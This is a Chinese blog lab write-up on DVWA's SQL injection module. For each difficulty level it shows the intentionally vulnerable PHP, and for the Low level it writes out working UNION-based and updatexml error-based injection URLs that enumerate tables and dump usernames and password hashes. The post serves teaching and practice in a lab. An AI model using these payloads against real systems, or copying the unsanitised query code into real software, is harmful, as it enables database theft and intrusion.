DVWA--SQL Injection(SQL注入-非盲注)(全难度)

最新推荐文章于 2024-04-23 09:08:55 发布
最新推荐文章于 2024-04-23 09:08:55 发布
阅读量362 收藏 3
点赞数 2
分类专栏: DVWA 文章标签: 渗透测试 SQL SQL注入 web安全 DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/114314446
版权

DVWA–SQL Injection(SQL 注入)非盲注

原理参考:网络安全笔记-99-渗透-SQL注入

逻辑

输入id查询用户名。

image-20210223111510096

难度分级

Low

单引号闭合,且有报错提示。

image-20210223111831154

核心代码
<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>
分析

没有过滤id参数直接带入数据库查询。

利用
联合查询
  • 查询列数:http://192.168.17.141/DVWA/vulnerabilities/sqli/?id=1’ order by 2–+&Submit=Submit#
  • 数据显示位置:http://192.168.17.141/DVWA/vulnerabilities/sqli/?id=-1’union select 1,2 --+&Submit=Submit#

image-20210223112609472

  • 查询数据库

image-20210223112702630

  • 查询表:http://192.168.17.141/DVWA/vulnerabilities/sqli/?id=-1’union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’) --+&Submit=Submit#

image-20210223114157925

  • 查询字段:http://192.168.17.141/DVWA/vulnerabilities/sqli/?id=-1’union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘dvwa’ and table_name=‘users’) --+&Submit=Submit#

image-20210223124359522

  • 查询数据:http://192.168.17.141/DVWA/vulnerabilities/sqli/?id=-1’union select 1,(select group_concat(concat_ws(0x7e,user,password)) from users) --+&Submit=Submit#

image-20210223124717380

报错查询

利用:http://192.168.17.141/DVWA/vulnerabilities/sqli/?id=1’union select updatexml(1,concat(0x7e, (select database() )),2) --+&Submit=Submit#

image-20210223124944262

Medium

核心代码
<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>
分析

mysqli_real_escape_string()函数转义在 SQL 语句中使用的字符串中的特殊字符,会被进行转义的字符包括: NUL (ASCII 0),\n,\r,\,’," 和 Control-Z

没有进行过滤,数字型直接带入数据库查询

利用

Medium难度的请求不在url里面,那么可能为post请求。通过bp抓包如下:

image-20210223151304522

image-20210223151656552

High

核心代码
<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?>
分析

用$_SESSION[ ‘id’ ] 替换了GET与POST 传入的ID。与Low级别相比,只多了一个limit 1.限制只能查询一条数据。单引号字符型注入。

利用

利用方式与Low相似。

Impossible

核心代码
<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>
分析

首先该级别采用了Token机制,加强了安全性。然后会首先判断ID是否为数字,然后使用预编译语句与PDO技术,有效防范了Sql注入。

wwxxee
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Dvwa练习06 SQL注入(Low)
coco3105的博客
02-19 1144
等级low分别用了手工和sqlmap注入,medium没实践,high采用的是旧版本,没过滤参数。
dvwa——sql注入
GZY0601的博客
09-16 601
Hello!转眼一看距离我上次发文章都是一年前的事情了,职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完破坏数据库。
sql注入盲注
最新发布
2302_79119987的博客
04-23 1625
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
SQL盲注(原理概述、分类)
热门推荐
小赵同学的博客
12-29 2万+
盲注原理 盲注的分类 盲注常用函数 盲注的利用方法 一、SQL盲注概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。 2.盲注是不能通过直接显示的途径来获取数据库数据的方法。 盲注可以分为三类: 布尔盲注 时间盲注 报错型盲注 1、布尔盲注 盲注查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
SQL盲注
weixin_59872639的博客
02-18 2441
盲注SQL注入过程SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 在盲注,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,盲注可分为两类: 基于布尔的盲注(Boolean based) 基于时间的盲注(Time based) 基于布尔的盲注 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
DVWA-SQL注入
acdcccc的博客
08-26 311
分享DVWA靶场的SQL注入过程
DVWA-master.zip
03-13
1. SQL注入SQL Injection):这是Web应用最常见的一种安全漏洞,允许攻击者通过构造恶意的SQL语句来获取、修改或删除数据库的数据。在DVWA,你可以学习如何识别SQL注入点,以及如何利用它们执行任意的SQL...
DVWAsql注入——联合注入和报错注入
Williamanddog的博客
12-20 1893
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的符合string 的字符串替换为value的值。
SQL注入2——盲注(重学)
qq_52263650的博客
11-07 3781
SQL注入2——布尔型盲注(重学)
DVWA SQL注入
m0_55605024的博客
03-01 499
简而言之,是在输入字符串之注入SQL指令,在设计不良的程序当忽略了字符检查,那么这些。如:将'dvwa'替换为database() or 替换为0x64767761(将'dvwa'进行16进制编码)2.安装kali操作系统,kali自带sqlmap,可以直接输入sqlmap执行。注入进去的恶意指令就会被数据库误以为是正常的SQL指令而运行。--dbs:database serve 获取所有的数据库名。database():返回当前数据库的名称。防御命令执行的最高效的方法,就是。
史上最详细的SQL盲注入门教程
weixin_44867191的博客
05-16 1378
正常情况下,用户输入用户名id,就能查到用户信息,但是如果攻击者输入的内容是:666' or '1'='1,那么查询的SQL语句就变成SELECT name,age FROM users WHERE user_id = '666' or '1'='1',由于1=1恒成立,就会执行SQL,执行后,就会返回所有的学生信息,有回显信息,这就是典型的。如果执行SQL后,应用程序不显示任何具体的数据,可能只是告诉我们查询成功或者查询失败,或者什么都不说,没有回显,但是SQL还是执行了,SQL注入发生了,这就是。
GIS小软件:diva-gis
01-07
一个GIS小软件,很好用哦,大家都来试试吧
DVWA-SQL注入级别)
小纯的博客
02-08 6344
一、SQL注入概念 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现法操作,以此来实现欺骗数据库服务器执行授权的任意查询,从而进一步得到相应的数据信息。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库的表 6.获取表的字段名 7.得到数据 ...
SQL盲注详解
永远是少年
07-17 897
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL盲注详解。 一、SQL盲注详解 二、查询SQL语句介绍 三、SQL盲注类型
SQL注入(盲注)
a12332251的博客
12-07 926
SQL
SQL注入盲注
xiao_he0123的博客
03-20 6997
SQL注入盲注前言一、盲注分类二、具体解析1.基于布尔的sql盲注首先要先了解一下sql注入截取字符串常用的函数:(1)mid()函数(2)substr()函数(3)left()函数具体注入方法2.基于时间的SQL盲注3.基于报错的SQL盲注1.extractvalue()函数2.uodatexml()函数3.floor()函数 前言 何为盲注盲注就是在 sql 注入过程sql 语句执行的选择后,选择的数据不能回显 到前端页面 一、盲注分类 盲注分为三类: (1)基于布尔的SQL盲注 (2)基于事
DVWA——SQL盲注等级)
@一只躺平的猪@的博客
07-13 5524
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
[zkaq靶场]SQL注入--POST注入
wwxxee
05-08 447
SQL注入–POST注入 POST注入 POST型注入与GET型注入没有本质区别 POST注入一 输入账号密码,然后抓包 检测出单引号闭合的方式,接下来就可以进行注入. 检测出字段数 username=admin’ order by 3–+&password=1&submit=%E7%99%BB%E5%BD%95 检测回显点 ![] 爆库 username=admin1’ union select 1,2,database()–+&password=1&su
SQL Injection4(sqlmap)
kid的博客
04-12 398
SQL Injection4(sqlmap) 前言 前面把手工注入算是简单的练习了一遍,这里来学习下sqlmap,感受下工具的强大。主要也是针对dvwasql注入盲注sqlmap再来一遍,然后试下文件的上传下载等功能。算是对sqlmap的一个入门吧。 参数 sqlmap的参数真的很多,下面这篇博客把所有sqlmap -hh的参数都进行了文翻译,挺方便后面查阅的 超详细SQLMap使用攻略及...
dvwa靶场初级sql注入
07-28
DVWA(Damn Vulnerable Web Application)靶场,初级SQL注入是一种常见的漏洞类型。SQL注入是一种攻击技术,通过在Web应用程序注入恶意的SQL代码来绕过应用程序的安全控制,从而获取法访问或执行未经授权的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值